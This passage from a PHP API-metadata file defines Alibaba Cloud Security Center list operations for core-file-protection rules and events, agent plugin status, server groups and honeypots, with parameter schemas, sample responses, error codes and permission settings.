'summary' => 'Retrieves all file types for file protection rules.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListFileProtectClientRuleFileType', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"FileTypes\\": [\\n \\"txt\\"\\n ]\\n}","type":"json"}]', ], 'ListFileProtectEvent' => [ 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '189052', 'abilityTreeNodes' => ['FEATUREsas4GT4R7'], ], 'parameters' => [ [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The rule name.', 'type' => 'string', 'required' => false, 'example' => 'test-rule-1', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => [ 'description' => 'The event status. Valid values:'."\n" ."\n" .'- 0: Unhandled. '."\n" .'- 1: Manually handled.'."\n" .'- 2: Whitelisted.'."\n" .'- 3: Ignored.', 'type' => 'string', 'enum' => ['0', '1', '2', '3'], 'required' => false, 'example' => '2', 'title' => '', ], ], [ 'name' => 'AlertLevels', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of alert notification levels.', 'type' => 'array', 'items' => ['description' => 'The alert notification level. Valid values:'."\n" ."\n" .'- 0: no alert'."\n" ."\n" .'- 1: reminder'."\n" ."\n" .'- 2: suspicious'."\n" ."\n" .'- 3: high-risk.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'minimum' => '1', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page in a paging query.', 'type' => 'string', 'maxLength' => 100, 'minLength' => 1, 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'InstanceId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset instance.', 'type' => 'string', 'required' => false, 'example' => 'i-bp1g6wxdwps7s9dz****', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to query.'."\n" .'>You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '4fe8e1cd-3c37-4851-b9de-124da32c****', 'title' => ''], ], [ 'name' => 'InstanceName', 'in' => 'query', 'schema' => ['description' => 'The name of the server to query.', 'type' => 'string', 'required' => false, 'example' => 'ca_cpm_****', 'title' => ''], ], [ 'name' => 'InternetIp', 'in' => 'query', 'schema' => ['description' => 'The public IP address of the asset to query.', 'type' => 'string', 'required' => false, 'example' => '120.27.XX.XX', 'title' => ''], ], [ 'name' => 'IntranetIp', 'in' => 'query', 'schema' => ['description' => 'The private IP address of the asset to query.', 'type' => 'string', 'required' => false, 'example' => '172.26.XX.XX', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp of the start time.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1656038740435', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp of the end time.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1683257937775', 'title' => ''], ], [ 'name' => 'Operation', 'in' => 'query', 'schema' => ['description' => 'The type of operation performed on the file. Valid values:'."\n" ."\n" .'- **DELETE**: deletes the file.'."\n" .'- **WRITE**: writes to the file.'."\n" .'- **READ**: reads the file.'."\n" .'- **RENAME**: renames the file.'."\n" .'- **CHOWN**: changes the file owner and associated group.', 'type' => 'string', 'required' => false, 'example' => 'READ', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => '23AD0BD2-8771-5647-819E-6BA51E212F80'], 'EventList' => [ 'description' => 'The list of events.', 'type' => 'array', 'items' => [ 'description' => 'The file monitoring event.', 'type' => 'object', 'properties' => [ 'AlertLevel' => ['description' => 'The alert notification level. Valid values:'."\n" ."\n" .'- 0: no alert'."\n" ."\n" .'- 1: reminder'."\n" ."\n" .'- 2: suspicious'."\n" ."\n" .'- 3: high-risk.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server associated with the process.', 'type' => 'string', 'example' => '94b44720-d982-4d20-a4e1-80a1a57b****', 'title' => ''], 'RuleName' => ['description' => 'The rule name.', 'type' => 'string', 'example' => 'test-rule-1'."\n", 'title' => ''], 'LatestTime' => ['description' => 'The most recent time when the event occurred.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694576692000', 'title' => ''], 'Status' => ['description' => 'The event status. Valid values:'."\n" ."\n" .'- 0: Unhandled. '."\n" .'- 1: Manually handled.'."\n" .'- 2: Whitelisted.'."\n" .'- 3: Ignored.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Id' => ['description' => 'The event ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '161757', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server instance.', 'type' => 'string', 'example' => 'kyy-admin-01', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '121.40.XX.XX'."\n", 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the asset.', 'type' => 'string', 'example' => '172.22.XX.XX', 'title' => ''], 'FilePath' => ['description' => 'The file path on which the process operates.', 'type' => 'string', 'example' => '/etc/pam.d/su', 'title' => ''], 'Operation' => ['description' => 'The operation performed by the process on the file.', 'type' => 'string', 'example' => 'DELETE', 'title' => ''], 'Remark' => ['description' => 'The remarks.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'ProcPermission' => ['description' => 'The process permission.', 'type' => 'string', 'example' => 'rwxr-xr-x', 'title' => ''], 'CmdLine' => ['description' => 'The command line of the event.', 'type' => 'string', 'example' => '["touch","/test/aaaa"]', 'title' => ''], 'ProcPath' => ['description' => 'The process path.', 'type' => 'string', 'example' => ' /usr/bin/sshpass', 'title' => ''], 'HandleTime' => ['description' => 'The time when the event was handled.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694576692000', 'title' => ''], 'ProcessId' => ['description' => 'The process ID of the event.', 'type' => 'string', 'example' => '52636', 'title' => ''], 'Platform' => ['description' => 'The operating system type. Valid values:'."\n" ."\n" .'- **windows**: Windows'."\n" .'- **linux**: Linux.', 'type' => 'string', 'example' => 'linux', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information of the query result.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries returned per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '149', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Get core file protection alert event list', 'summary' => 'Filters and retrieves a list of rules that match the specified conditions.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListFileProtectEvent'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListFileProtectEvent', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"23AD0BD2-8771-5647-819E-6BA51E212F80\\",\\n \\"EventList\\": [\\n {\\n \\"AlertLevel\\": 1,\\n \\"Uuid\\": \\"94b44720-d982-4d20-a4e1-80a1a57b****\\",\\n \\"RuleName\\": \\"test-rule-1\\\\n\\",\\n \\"LatestTime\\": 1694576692000,\\n \\"Status\\": 1,\\n \\"Id\\": 161757,\\n \\"InstanceName\\": \\"kyy-admin-01\\",\\n \\"InternetIp\\": \\"121.40.XX.XX\\\\n\\",\\n \\"IntranetIp\\": \\"172.22.XX.XX\\",\\n \\"FilePath\\": \\"/etc/pam.d/su\\",\\n \\"Operation\\": \\"DELETE\\",\\n \\"Remark\\": \\"test\\",\\n \\"ProcPermission\\": \\"rwxr-xr-x\\",\\n \\"CmdLine\\": \\"[\\\\\\"touch\\\\\\",\\\\\\"/test/aaaa\\\\\\"]\\",\\n \\"ProcPath\\": \\" /usr/bin/sshpass\\",\\n \\"HandleTime\\": 1694576692000,\\n \\"ProcessId\\": \\"52636\\",\\n \\"Platform\\": \\"linux\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 149\\n }\\n}","type":"json"}]', ], 'ListFileProtectPluginStatus' => [ 'summary' => 'Retrieves information about the Security Center agent installed on servers on which core file monitoring rules take effect. The information includes the installation status of the Security Center agent and whether the core file monitoring feature is supported.', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '188949', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], ], 'parameters' => [ [ 'name' => 'SwitchId', 'in' => 'query', 'schema' => ['description' => 'The ID of the core file monitoring rule.', 'type' => 'string', 'required' => false, 'example' => 'FILE_PROTECT_RULE_SWITCH_TYPE_1693474122927', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 'int64', 'maximum' => '100', 'minimum' => '1', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number.', 'type' => 'integer', 'format' => 'int64', 'minimum' => '1', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The request ID.', 'type' => 'string', 'example' => '60F289EC-BAA3-5DF1-8476-B3F05A14EBC2'], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '149', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Data' => [ 'description' => 'The data returned if the call is successful.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Installed' => ['description' => 'Indicates whether the Security Center agent is installed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Online' => ['description' => 'Indicates whether the Security Center agent is online. Valid value:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'SupportFile' => ['description' => 'Indicates whether the core file monitoring file is supported.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'InstallCode' => ['description' => 'The returned code after you install the Security Center agent. Valid values:'."\n" ."\n" .'1. 0: The installation is successful.'."\n" ."\n" .'2. -2: The kernel does not support the installation.', 'type' => 'string', 'example' => '-2', 'title' => ''], 'InstallMessage' => ['description' => 'The returned message after you install the Security Center agent.', 'type' => 'string', 'example' => 'driver file not exist', 'title' => ''], 'ClientVersion' => ['description' => 'The version of the Security Center agent.', 'type' => 'string', 'example' => '00_41', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the asset.', 'type' => 'string', 'example' => '6690a46c-0edb-4663-a641-3629d1a9****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address that is associated with the instance.', 'type' => 'string', 'example' => '172.16.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address that is associated with the instance.', 'type' => 'string', 'example' => '10.42.XX.XX', 'title' => ''], 'InstanceName' => ['description' => 'The name of the instance.', 'type' => 'string', 'example' => 'i-wz92q7m5hsbgfhdss***', 'title' => ''], 'Platform' => ['description' => 'The type of the operating system. Valid values:'."\n" ."\n" .'- **windows**: Windows'."\n" ."\n" .'- **linux**: Linux', 'type' => 'string', 'example' => 'linux', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"60F289EC-BAA3-5DF1-8476-B3F05A14EBC2\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 149\\n },\\n \\"Data\\": [\\n {\\n \\"Installed\\": true,\\n \\"Online\\": true,\\n \\"SupportFile\\": true,\\n \\"InstallCode\\": \\"-2\\",\\n \\"InstallMessage\\": \\"driver file not exist\\",\\n \\"ClientVersion\\": \\"00_41\\",\\n \\"Uuid\\": \\"6690a46c-0edb-4663-a641-3629d1a9****\\",\\n \\"InternetIp\\": \\"172.16.XX.XX\\",\\n \\"IntranetIp\\": \\"10.42.XX.XX\\",\\n \\"InstanceName\\": \\"i-wz92q7m5hsbgfhdss***\\",\\n \\"Platform\\": \\"linux\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'ListFileProtectPluginStatus', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListFileProtectPluginStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListFileProtectPluginStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListFileProtectRule' => [ 'summary' => 'Queries core file monitoring rules.', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '188626', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], ], 'parameters' => [ [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'maximum' => '100', 'minimum' => '1', 'example' => '10', 'default' => '10', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'minimum' => '1', 'example' => '1', 'default' => '1', 'title' => ''], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The name of the rule.'."\n", 'type' => 'string', 'required' => false, 'example' => 'test-rule-1', 'title' => ''], ], [ 'name' => 'AlertLevel', 'in' => 'query', 'schema' => [ 'description' => 'The severity of alerts. Valid values:'."\n" ."\n" .'* 0: does not generate alerts'."\n" .'* 1: sends notifications'."\n" .'* 2: suspicious'."\n" .'* 3: high-risk'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'enum' => ['0', '1', '2', '3'], 'title' => '', ], ], [ 'name' => 'RuleAction', 'in' => 'query', 'schema' => ['description' => 'The handling method of the rule. Valid values:'."\n" ."\n" .'* pass: allow'."\n" .'* alert'."\n", 'type' => 'string', 'required' => false, 'example' => 'pass', 'title' => ''], ], [ 'name' => 'Platform', 'in' => 'query', 'schema' => ['description' => 'The type of the operating system. Valid values:'."\n" ."\n" .'* **windows**: Windows'."\n" .'* **linux**: Linux', 'type' => 'string', 'required' => false, 'example' => 'linux', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'FBBEB173-1F43-505F-A876-C03ECDF6CE4C', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '253', 'title' => ''], ], 'title' => '', 'example' => '', ], 'FileProtectList' => [ 'description' => 'The details of returned data.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the rule. Valid values:'."\n" ."\n" .'* 0: disabled'."\n" .'* 1: enabled'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AlertLevel' => ['description' => 'The severity of alerts. Valid values:'."\n" ."\n" .'* 0: does not generate alerts'."\n" .'* 1: sends notifications'."\n" .'* 2: suspicious'."\n" .'* 3: high-risk'."\n", 'type' => 'string', 'example' => '0', 'title' => ''], 'SwitchId' => ['description' => 'The switch ID of the rule.'."\n", 'type' => 'string', 'example' => 'FILE_PROTECT_RULE_SWITCH_TYPE_1693474122927', 'title' => ''], 'Id' => ['description' => 'The ID of the rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1412511', 'title' => ''], 'FileOps' => [ 'description' => 'The operations performed on the files.'."\n", 'type' => 'array', 'items' => ['description' => 'The operation performed on the file. Valid values:'."\n" ."\n" .'* WRITE'."\n" .'* READ'."\n" .'* DELETE'."\n" .'* RENAME'."\n" .'* CHMOD: change permissions'."\n", 'type' => 'string', 'example' => 'READ', 'title' => ''], 'title' => '', 'example' => '', ], 'Action' => ['description' => 'The handling method of the rule. Valid values:'."\n" ."\n" .'* pass: allow'."\n" .'* alert'."\n", 'type' => 'string', 'example' => 'pass', 'title' => ''], 'FilePaths' => [ 'description' => 'The paths to the monitored files. Wildcard characters are supported.'."\n", 'type' => 'array', 'items' => ['description' => 'The path to the monitored file.'."\n", 'type' => 'string', 'example' => '/usr/*', 'title' => ''], 'title' => '', 'example' => '', ], 'ProcPaths' => [ 'description' => 'The paths to the monitored processes. Wildcard characters are supported.'."\n", 'type' => 'array', 'items' => ['description' => 'The path to the monitored process.'."\n", 'type' => 'string', 'example' => '/usr/local/*', 'title' => ''], 'title' => '', 'example' => '', ], 'RuleName' => ['description' => 'The name of the rule.'."\n", 'type' => 'string', 'example' => 'test11', 'title' => ''], 'GmtCreate' => ['description' => 'The time when the rule was created.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1682304179000', 'title' => ''], 'GmtModified' => ['description' => 'The time when the rule was last modified.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1682304179000', 'title' => ''], 'EffectInstanceCount' => ['description' => 'The total number of affected assets.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '12', 'title' => ''], 'Platform' => ['description' => 'The type of the operating system. Valid values:'."\n" ."\n" .'* **windows**: Windows'."\n" .'* **linux**: Linux', 'type' => 'string', 'example' => 'linux', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"FBBEB173-1F43-505F-A876-C03ECDF6CE4C\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 253\\n },\\n \\"FileProtectList\\": [\\n {\\n \\"Status\\": 1,\\n \\"AlertLevel\\": \\"0\\",\\n \\"SwitchId\\": \\"FILE_PROTECT_RULE_SWITCH_TYPE_1693474122927\\",\\n \\"Id\\": 1412511,\\n \\"FileOps\\": [\\n \\"READ\\"\\n ],\\n \\"Action\\": \\"pass\\",\\n \\"FilePaths\\": [\\n \\"/usr/*\\"\\n ],\\n \\"ProcPaths\\": [\\n \\"/usr/local/*\\"\\n ],\\n \\"RuleName\\": \\"test11\\",\\n \\"GmtCreate\\": 1682304179000,\\n \\"GmtModified\\": 1682304179000,\\n \\"EffectInstanceCount\\": 12,\\n \\"Platform\\": \\"linux\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'ListFileProtectRule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListFileProtectRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListFileProtectRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ClientFileProtect', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:clientfileprotect/*'], ], ], ], ], ], 'ListGroups' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page to return. Minimum value: 1. Default value: 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '89', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page in a paging query. Default value: 20. Maximum value: 2000.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'NextToken', 'in' => 'query', 'schema' => ['description' => 'The token for the next query. If NextToken is empty, no additional results exist. If NextToken has a value, the value indicates the token to use for the next query.', 'type' => 'string', 'required' => false, 'example' => '1426C575705AE8545E8360A6EFA3B***', 'title' => ''], ], [ 'name' => 'UseNextToken', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to use the NextToken method to retrieve the vulnerability list data. If this parameter is used, TotalCount is no longer returned. Valid values:'."\n" ."\n" .'- **true**: Uses the NextToken method.'."\n" .'- **false**: Does not use the NextToken method.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PageResult', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The list of server groups.', 'type' => 'array', 'items' => [ 'description' => 'The server group.', 'type' => 'object', 'properties' => [ 'GroupId' => ['description' => 'The ID of the server group.', 'type' => 'integer', 'format' => 'int64', 'example' => '11028542', 'title' => ''], 'GroupName' => ['description' => 'The name of the server group.', 'type' => 'string', 'example' => 'cn-shenzhen+dir-1440978***', 'title' => ''], 'GroupFlag' => ['description' => 'The type of the server group. Valid values:'."\n" .'- **0**: default group'."\n" .'- **1**: other group.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information of the query results.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '202', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'NextToken' => ['description' => 'The NextToken value returned when the NextToken method is used.', 'type' => 'string', 'example' => 'B604532DEF982B875E8360A6EFA3B***', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the exception event was processed. Valid values:'."\n" ."\n" .'- **true**: Processed.'."\n" .'- **false**: Not processed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned by the API request.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information of the error code.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request, which can be used for troubleshooting and diagnostics.', 'type' => 'string', 'example' => 'CB414DB5-F692-5DAB-9F0F-975C060AF***', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve server group list', 'summary' => 'Retrieves the list of server groups for the current user.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListGroups'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListGroups', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"GroupId\\": 11028542,\\n \\"GroupName\\": \\"cn-shenzhen+dir-1440978***\\",\\n \\"GroupFlag\\": 1\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 202,\\n \\"Count\\": 4,\\n \\"NextToken\\": \\"B604532DEF982B875E8360A6EFA3B***\\"\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"CB414DB5-F692-5DAB-9F0F-975C060AF***\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'ListHoneypot' => [ 'summary' => 'Queries a list of honeypots.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'HoneypotName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the honeypot.', 'type' => 'string', 'required' => false, 'example' => 'mx-rouyi'], ], [ 'name' => 'NodeName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the honeypot management node.', 'type' => 'string', 'required' => false, 'example' => 'honeypot_master'], ], [ 'name' => 'NodeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the honeypot management node.', 'type' => 'string', 'required' => false, 'example' => 'a882e590-b87b-45a6-87b9-d0a3e5a0****'], ], [ 'name' => 'HoneypotIds', 'in' => 'query', 